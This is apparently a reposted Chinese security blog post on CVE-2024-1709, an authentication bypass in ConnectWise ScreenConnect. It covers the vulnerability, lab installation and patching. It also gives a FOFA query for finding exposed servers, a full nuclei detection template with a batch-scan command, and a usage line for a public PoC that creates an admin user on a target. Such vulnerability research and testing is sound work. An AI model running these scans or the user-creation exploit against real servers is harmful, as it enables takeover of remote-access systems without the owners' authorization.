CVE-2024-1709

admin 2024年2月28日07:46:48297 views字数 2510阅读8分22秒阅读模式

01漏洞名称

ConnectWise ScreenConnect使用备用路径或通道绕过身份验证漏洞

02漏洞影响

ConnectWise ScreenConnect 23.9.7及之前版本

CVE-2024-1709

03漏洞描述

ConnectWise ScreenConnect 23.9.7及之前版本存在身份验证绕过漏洞,攻击者可通过替代路径或通道绕过身份验证,未经授权攻击者可以利用此漏洞注册账户,登陆到产品后台,而且可以通过 ScreenConnect的原有功能执行操作系统命令,直接访问机密信息或关键系统。

详细漏洞分析请参考

https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass

04FOFA搜索语句

icon_hash="-82958153"

CVE-2024-1709

05靶场安装

上官网根据自己的操作系统下载对应的安装包

https://screenconnect.connectwise.com/download/archive

CVE-2024-1709

我是在centos上安装,先上传安装包,然后解压

tar -zxvf ScreenConnect_20.3.31734.7751_Release.tar.gzcd ScreenConnect_20.3.31734.7751_Install

执行安装脚本


./install.sh

CVE-2024-1709

访问页面

http://localhost:8040/Host

CVE-2024-1709

CVE-2024-1709

然后在官网免费申请一个使用license即可

06批量验证POC

nuclei poc文件内容如下

id: CVE-2024-1709

info:  name: ConnectWise ScreenConnect 23.9.7 - Authentication Bypass  author: johnk3r  severity: critical  description: |    ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.  reference:    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass    - https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8    - https://nvd.nist.gov/vuln/detail/CVE-2024-1709  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H    cvss-score: 10.0    cve-id: CVE-2024-1709    cwe-id: CWE-288  metadata:    verified: true    max-request: 1    vendor: connectwise    product: screenconnect    shodan-query: http.favicon.hash:-82958153  tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev

variables:  string: "{{rand_text_alpha(10)}}"

http:  - method: GET    path:      - "{{BaseURL}}/SetupWizard.aspx/{{string}}"

    matchers-condition: and    matchers:      - type: word        part: body        words:          - "SetupWizardPage"          - "ContentPanel SetupWizard"        condition: and

      - type: status        status:          - 200

    extractors:      - type: kval        part: header        kval:          - Server# digest: 4a0a004730450220564c9949c406c35520203b46a2a34bba505d1cadfde47e8a38f9a073264e97f0022100ff2a065d66fa48b8502a068445d833e6700efd1e9715d034f1ea16e91696bd06:922c64590222798bb761d5b6d8e72950

运行POC

nuclei.exe -l data/CVE-2024-1709.txt -t mypoc/cve/CVE-2024-1709.yaml

CVE-2024-1709

07漏洞利用

github上有python版的代码可以添加用户

https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc

使用方法

python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

创建好用户后直接登录后台,可以执行系统命令。

CVE-2024-1709

08修复建议

升级到23.9.8以上版本。

https://screenconnect.connectwise.com/download

原文始发于微信公众号(AI与网安):CVE-2024-1709

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月28日07:46:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-1709https://cn-sec.com/archives/2532176.html
评论  2  访客  2
    • 123 0

      试用的许可证如何获取

    发表评论

    匿名网友 填写信息